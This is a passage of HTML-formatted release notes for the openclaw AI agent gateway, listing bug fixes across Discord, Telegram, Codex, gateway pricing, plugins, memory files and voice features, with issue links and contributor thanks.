<p>Control UI/chat: show inline feedback when local slash-command dispatch is unavailable or fails unexpectedly instead of clearing the composer silently. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115024686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52105" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52105/hovercard" href="https://github.com/openclaw/openclaw/issues/52105">#52105</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MooreQiao/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MooreQiao">@MooreQiao</a>.</p>
</li>
<li>
<p>Memory/markdown: replace CRLF managed blocks in place and collapse duplicate marker blocks without rewriting unmanaged markdown, so Dreaming and Memory Wiki files self-heal from repeated generated sections. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363293115" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75491" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75491/hovercard" href="https://github.com/openclaw/openclaw/issues/75491">#75491</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363308439" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75495/hovercard" href="https://github.com/openclaw/openclaw/pull/75495">#75495</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366593323" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75810" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75810/hovercard" href="https://github.com/openclaw/openclaw/pull/75810">#75810</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368473075" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76008" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/76008/hovercard" href="https://github.com/openclaw/openclaw/pull/76008">#76008</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/asaenokkostya-coder/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/asaenokkostya-coder">@asaenokkostya-coder</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ottodeng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ottodeng">@ottodeng</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/everettjf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/everettjf">@everettjf</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lrg913427-dot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lrg913427-dot">@lrg913427-dot</a>.</p>
</li>
<li>
<p>Agents/tools: return critical tool-loop circuit-breaker stops as blocked tool results instead of thrown tool failures, so models see the guardrail and stop retrying the same call. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rayraiser/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rayraiser">@rayraiser</a>.</p>
</li>
<li>
<p>Agents/sessions: preserve pre-existing runtime model and context window after heartbeat turns so a per-run heartbeat model override does not bleed into shared-session status. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363070391" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75452" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75452/hovercard" href="https://github.com/openclaw/openclaw/issues/75452">#75452</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhangguiping-xydt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhangguiping-xydt">@zhangguiping-xydt</a>.</p>
</li>
<li>
<p>Model commands: clarify direct and inline <code>/model</code> acknowledgements for non-default selections as session-scoped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/addu2612/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/addu2612">@addu2612</a>.</p>
</li>
<li>
<p>Doctor/gateway: stop warning that non-existent, unconfigured user-bin directories are required in the Gateway service PATH. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368545711" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76017" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76017/hovercard" href="https://github.com/openclaw/openclaw/issues/76017">#76017</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/xiphis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xiphis">@xiphis</a>.</p>
</li>
<li>
<p>TUI/chat: skip full provider model normalization during context-window warmup while preserving provider-owned context metadata, avoiding cold-start stalls with large model registries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/547895019/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/547895019">@547895019</a>.</p>
</li>
<li>
<p>Agents: enable malformed tool-call argument repair for Codex and Azure OpenAI Responses transports while keeping generic OpenAI Responses paths out of the repair gate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359521991" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75154" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75154/hovercard" href="https://github.com/openclaw/openclaw/issues/75154">#75154</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nimraakram22/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nimraakram22">@Nimraakram22</a>.</p>
</li>
<li>
<p>Memory Wiki: accept relative Markdown links that include the <code>.md</code> suffix during broken-wikilink validation, avoiding false positives for native render-mode links. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kenneth8128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kenneth8128">@Kenneth8128</a>.</p>
</li>
<li>
<p>OpenAI Codex: show the device-pairing code in the interactive SSH/headless prompt while keeping the short-lived code out of persistent runtime logs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348981712" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74212" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74212/hovercard" href="https://github.com/openclaw/openclaw/issues/74212">#74212</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/da22le123/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/da22le123">@da22le123</a>.</p>
</li>
<li>
<p>QA Lab: stop gateway children when the suite parent disappears, so interrupted local QA runs cannot leave hot orphaned gateways behind.</p>
</li>
<li>
<p>Codex/app-server: tolerate a second connection close during startup recovery and include retry counts plus stringified errors in the restart warning, so concurrent lanes do not fail after one shared-client race.</p>
</li>
<li>
<p>Plugins/CLI: cache plugin CLI registration entries per command program so completion state generation does not repeat the full plugin sweep in one invocation. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ScientificProgrammer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ScientificProgrammer">@ScientificProgrammer</a>.</p>
</li>
<li>
<p>Plugins: reuse gateway-bindable plugin loader cache entries for later default-mode loads without serving default-built registries to gateway-bound requests, reducing repeated plugin registration during dispatch. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4210492312" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61756" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61756/hovercard" href="https://github.com/openclaw/openclaw/issues/61756">#61756</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Gateway/secrets: include the caught error message in <code>secrets.reload</code> and <code>secrets.resolve</code> warning logs while keeping RPC errors generic, so operators can diagnose reload and permission failures. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/davidangularme/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/davidangularme">@davidangularme</a>.</p>
</li>
<li>
<p>Providers/OpenRouter: fill DeepSeek V4 <code>reasoning_content</code> replay placeholders for <code>openrouter/deepseek/deepseek-v4-flash</code> and <code>openrouter/deepseek/deepseek-v4-pro</code>, so thinking/tool follow-up turns do not fail with DeepSeek's replay-shape error. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368552053" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76018" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76018/hovercard" href="https://github.com/openclaw/openclaw/issues/76018">#76018</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cloph-dsp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cloph-dsp">@cloph-dsp</a>.</p>
</li>
<li>
<p>Anthropic-compatible streams: recover text deltas that arrive before their matching content block, so Kimi Code and similar providers do not finish as empty <code>incomplete_result</code> replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368472046" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76007" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76007/hovercard" href="https://github.com/openclaw/openclaw/issues/76007">#76007</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vliuyt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vliuyt">@vliuyt</a>.</p>
</li>
<li>
<p>fix(infra): block workspace state-directory env override [AI]. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367841633" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75940/hovercard" href="https://github.com/openclaw/openclaw/pull/75940">#75940</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pgondhi987/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pgondhi987">@pgondhi987</a>.</p>
</li>
<li>
<p>MCP/OpenAI: normalize parameter-free tool schemas whose top-level object <code>properties</code> is missing, null, or invalid before sending tools to OpenAI, so MCP tools without params stay usable. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362431372" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75362" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75362/hovercard" href="https://github.com/openclaw/openclaw/issues/75362">#75362</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tolkonepiu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tolkonepiu">@tolkonepiu</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SymbolStar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SymbolStar">@SymbolStar</a>.</p>
</li>
<li>
<p>TTS: honor explicit short <code>[[tts:text]]...[[/tts:text]]</code> blocks while keeping untagged short auto-TTS suppressed, so tagged voice replies are synthesized instead of being dropped as empty voice-only payloads. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345594550" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73758" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73758/hovercard" href="https://github.com/openclaw/openclaw/issues/73758">#73758</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yfge/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yfge">@yfge</a>.</p>
</li>
<li>
<p>Hooks/doctor: warn when <code>hooks.transformsDir</code> points outside the canonical hooks transform directory, so invalid workspace skill paths get a direct recovery hint before the Gateway crash-loops. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367117797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75853" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75853/hovercard" href="https://github.com/openclaw/openclaw/issues/75853">#75853</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/midobk/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/midobk">@midobk</a>.</p>
</li>
<li>
<p>Proxy/audio: convert standard <code>FormData</code> bodies before proxy-backed undici fetches, so audio transcription and multipart uploads no longer send <code>[object FormData]</code> when <code>HTTP_PROXY</code> or <code>HTTPS_PROXY</code> is configured. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4085311223" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48554" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48554/hovercard" href="https://github.com/openclaw/openclaw/issues/48554">#48554</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dco5/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dco5">@dco5</a>.</p>
</li>
<li>
<p>Discord: allow explicitly configured ack reactions in tool-only guild channels while keeping automatic lifecycle/status reactions suppressed. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355990759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74922" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74922/hovercard" href="https://github.com/openclaw/openclaw/issues/74922">#74922</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samvilian/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samvilian">@samvilian</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/BlueBirdBack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/BlueBirdBack">@BlueBirdBack</a>.</p>
</li>
<li>
<p>Discord: enable session-backed A2A announce target lookup so <code>sessions_send</code> uses the target session's <code>deliveryContext.accountId</code> or <code>lastAccountId</code> instead of falling back to the default bot in multi-account setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4055175543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42652/hovercard" href="https://github.com/openclaw/openclaw/issues/42652">#42652</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4112523352" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51626" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51626/hovercard" href="https://github.com/openclaw/openclaw/issues/51626">#51626</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069301815" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44773" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/44773/hovercard" href="https://github.com/openclaw/openclaw/pull/44773">#44773</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347442555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73975" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73975/hovercard" href="https://github.com/openclaw/openclaw/pull/73975">#73975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/irchelper/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/irchelper">@irchelper</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dpalfox/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dpalfox">@dpalfox</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>.</p>
</li>
<li>
<p>Discord/setup: write resolved guild/channel allowlist selections to the selected guild and channel instead of falling back to the wildcard guild during setup. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4079837629" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47788" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/47788/hovercard" href="https://github.com/openclaw/openclaw/pull/47788">#47788</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Eldersonar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Eldersonar">@Eldersonar</a>.</p>
</li>
<li>
<p>Discord: treat abort-time Carbon reconnect-exhausted events as expected shutdown during stale-socket restarts, so health-monitor restarts no longer reject the monitor lifecycle. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4176861539" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58216" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58216/hovercard" href="https://github.com/openclaw/openclaw/pull/58216">#58216</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347363347" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73949" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73949/hovercard" href="https://github.com/openclaw/openclaw/pull/73949">#73949</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Perttulands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Perttulands">@Perttulands</a>.</p>
</li>
<li>
<p>Discord/native commands: return an explicit warning when slash command dispatch or direct plugin execution produces no visible reply instead of a success-style completion ack. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186301600" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58986/hovercard" href="https://github.com/openclaw/openclaw/issues/58986">#58986</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213236198" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62057" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/62057/hovercard" href="https://github.com/openclaw/openclaw/pull/62057">#62057</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jb510/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jb510">@jb510</a>.</p>
</li>
<li>
<p>Discord: keep typing indicators alive during long tool runs and auto-compaction while keepalive ticks continue, so active sessions do not appear stalled before the final reply. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Squirbie/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Squirbie">@Squirbie</a>.</p>
</li>
<li>
<p>Discord: preserve multipart Content-Type headers for attachment uploads across REST fetch paths, so generated images and other media no longer fail delivery with <code>CONTENT_TYPE_INVALID</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/FunJim/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/FunJim">@FunJim</a>.</p>
</li>
<li>
<p>Discord: preserve attachment and sticker filenames when saving inbound media, so agents can see human-readable file names instead of only UUID-based paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4195120978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59744" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59744/hovercard" href="https://github.com/openclaw/openclaw/issues/59744">#59744</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xela92/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xela92">@xela92</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rockcent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rockcent">@rockcent</a>.</p>
</li>
<li>
<p>Discord: preserve non-ASCII channel names in session display labels while keeping allowlist matching on the existing ASCII slug contract. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/swjeong9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/swjeong9">@swjeong9</a>.</p>
</li>
<li>
<p>Discord/PluralKit: canonicalize proxied webhook turns to the original Discord message id for inbound dedupe, while preserving the proxy message id for reply routing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/acgh213/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/acgh213">@acgh213</a>.</p>
</li>
<li>
<p>Discord: only inject thread starter context on the first turn of the effective thread session, so follow-up thread replies do not repeat the starter block. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4047195697" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41355" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41355/hovercard" href="https://github.com/openclaw/openclaw/issues/41355">#41355</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067889287" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44447/hovercard" href="https://github.com/openclaw/openclaw/issues/44447">#44447</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067894290" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44449" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44449/hovercard" href="https://github.com/openclaw/openclaw/issues/44449">#44449</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/p3nchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/p3nchan">@p3nchan</a>.</p>
</li>
<li>
<p>Discord: resolve thread <code>ownerId</code> and <code>parentId</code> from Discord API-style snake_case payload fields, so bot-owned autoThreads do not require unnecessary mentions. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mgh3326/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mgh3326">@mgh3326</a>.</p>
</li>
<li>
<p>Gateway/diagnostics: include a bounded redacted startup error message in stability bundles, so crash-loop reports identify the failing plugin or contract without exposing secrets. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366332404" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75797" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75797/hovercard" href="https://github.com/openclaw/openclaw/issues/75797">#75797</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ymebosma/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ymebosma">@ymebosma</a>.</p>
</li>
<li>
<p>Gateway/pricing: defer optional model pricing catalog refresh until after sidecars and channels reach the ready path, so slow OpenRouter or LiteLLM pricing fetches cannot block Gateway readiness. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348322680" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74128" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74128/hovercard" href="https://github.com/openclaw/openclaw/issues/74128">#74128</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342339751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73486" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73486/hovercard" href="https://github.com/openclaw/openclaw/pull/73486">#73486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alprclbi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alprclbi">@alprclbi</a>.</p>
</li>
<li>
<p>Gateway/pricing: abort in-flight model pricing catalog fetches when Gateway shutdown stops the refresh loop, and avoid post-stop cache writes or refresh timers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331072247" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72208" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72208/hovercard" href="https://github.com/openclaw/openclaw/issues/72208">#72208</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rzcq/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rzcq">@rzcq</a>.</p>
</li>
<li>
<p>Codex/app-server: make startup retry cleanup ownership-aware so concurrent Codex lanes cannot close another lane's freshly restarted shared app-server client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Google Meet/Twilio: report missing dial-in details during setup and explain that Twilio cannot join Meet URLs without a phone dial plan.</p>
</li>
<li>
<p>Google Meet/Twilio: start the phone leg before sending Meet PIN DTMF, delay intro speech until after the post-connect dial sequence, and log each stage so operators can tell Twilio-leg audio from Meet-room audio.</p>
</li>
<li>
<p>Voice Call: accept provider call IDs for gateway speak/continue requests and report ended-call state from history instead of returning a generic "Call not found" for stale calls.</p>
</li>
<li>
<p>Control UI/Talk: allow the OpenAI Realtime WebRTC offer endpoint through the Control UI CSP, configure browser sessions with explicit VAD/transcription input settings, and surface OpenAI realtime error/lifecycle events instead of leaving Talk stuck as live with no diagnostic. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341743461" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73427/hovercard" href="https://github.com/openclaw/openclaw/issues/73427">#73427</a>.</p>
</li>
<li>
<p>Plugins: clarify config-selected duplicate plugin override diagnostics and document manifest schema updates for bundled-plugin forks. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3894832647" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/8582" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/8582/hovercard" href="https://github.com/openclaw/openclaw/issues/8582">#8582</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sachah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sachah">@sachah</a>.</p>
</li>
<li>
<p>CLI backends/Claude: make live-session JSONL turn caps bounded and configurable via <code>reliability.outputLimits</code>, raising the default guard for tool-heavy Claude CLI turns while preserving memory limits. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367015166" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75838" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75838/hovercard" href="https://github.com/openclaw/openclaw/issues/75838">#75838</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hcordoba840/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hcordoba840">@hcordoba840</a>.</p>
</li>
<li>
<p>Telegram/DMs: keep incidental <code>message_thread_id</code> reply-with-quote metadata on the flat DM session by default while preserving opt-in DM topic isolation for configured topics, <code>dm.threadReplies</code>, and <code>direct.&lt;chatId&gt;.threadReplies</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368172291" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75975" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75975/hovercard" href="https://github.com/openclaw/openclaw/issues/75975">#75975</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProjectEvolutionEVE/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProjectEvolutionEVE">@ProjectEvolutionEVE</a>.</p>
</li>
<li>
